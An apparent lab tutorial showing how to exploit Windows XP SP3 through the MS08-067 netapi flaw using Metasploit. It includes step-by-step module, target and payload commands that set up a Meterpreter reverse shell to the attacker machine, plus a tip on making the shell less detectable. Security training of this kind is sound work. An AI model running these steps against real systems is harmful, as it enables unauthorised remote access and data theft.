In this article, we’ll walk you through how to exploit a live install of Windows XP Service Pack 3. We’ll make use of the well-known vulnerability in the netapi32.dll in the Windows Operating System.
The vulnerability is in fact very dangerous because the attacker is not required to authenticate to the target machine prior to running the attack.
This article is inspired by the book Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman.
The exploit module we’ll make use of through the Metasploit framework is called exploit/windows/smb/ms08_067_netapi.
Before continuing with this tutorial, you’ll need to:
- Have a virtual machine running Kali Linux.
- Have a virtual machine running an unpatched version of Windows XP Service Pack 3.
- Have basic knowledge of the Linux command line.
Please note that it is illegal to perform this attack without the victim’s permission!
Using Metasploit to exploit Windows XP
Start off by firing up both virtual machines.
Log in to Kali Linux, and fire up a terminal window.
The first thing we’ll need to do is to start the Metasploit Framework.
Enter these commands into the terminal window:
- service postgresql start
The first command, “service postgresql start,” launches a PostgreSQL database, which Metasploit uses to track your commands.
The next command, “msfconsole,” launches the Metasploit text-based console. This is where we’ll perform our attack.
After “msfconsole” has finished loading (which can take a while), you should see something like this:
As previously mentioned, we’ll use the module, exploit/windows/smb/ms08_067_netapi. We tell metasploit which module to use by entering the following command:
- use windows/smb/ms08_067_netapi
Now that we’ve told Metasploit which exploit module we’d like to use, we need to set some options. Enter this into the command line to show all available options:
- show options
As you see, there are not many options that need to be set.
- RHOST: This is the target machine’s IP-address. We’ll set this in the next step.
- RPORT: This is the port we’ll perform our attack through. The default of 445 is fine.
- SMBPIPE: The browser is the correct SMBPIPE for this attack.
- Exploit Target: This is the target operating system. Automatic targeting is fine for this attack.
In other words, the only option we’ll need to set is the target IP-address. You can find the target IP-address by running “ipconfig” in cmd on your Windows VM. In my case, the IP-address is 10.0.0.17.
- set RHOST 10.0.0.17
The exploit module is now configured and ready to go. But, we’ll also have to tell Metasploit which payload it should install on the target machine. In this attack, we’ll use the payload “windows/meterpreter/reverse_tcp.”
- set payload windows/meterpreter/reverse_tcp
The payload windows/meterpreter/reverse_tcp will create a reverse shell.
A reverse shell will push a connection from the target machine (windows) back to the attacker (Kali).
In practice, this means that our Kali machine will open a local port and listen for a connection from the target machine on port 4444 (LPORT).
Note that this isn’t stealthy at all. You should at least change the LPORT to a regular port number like 80 (HTTP) to have any chance of succeeding.
You may have noticed that the LHOST field doesn’t contain anything. We’ll need to set LHOST to our Kali IP-address, which is 10.0.0.107 in my case.
The payload needs this information so the victim machine can connect back to the attacking machine.
- set LHOST 10.0.0.107
Everything’s now set up in Metasploit. Before proceeding, make sure that the Windows firewall is deactivated on your Windows VM.
You should also create a txt-file on your desktop in the Windows VM. The content can be anything you like; we’ll just use it to illustrate the power of this attack.
Now that you’re all set and ready to go, let’s exploit the target machine. Type this command to proceed:
What has actually happened here?
When exploiting our target machine (Windows XP), we delivered a payload, which initiated a reverse shell connection.
The reverse shell made our target machine connect back to the attacking machine (Kali Linux), providing a shell connection directly to the Windows Operating System.
Let’s navigate to the file we created earlier in the Desktop folder (on the Administrator user in my case):
Now, we only need to navigate to the Desktop folder and view the content of the file using the “cat” command.
Congratulations! You have now gained access to a remote Windows XP operating system, using the exploit/windows/smb/ms08_067_netapi exploit!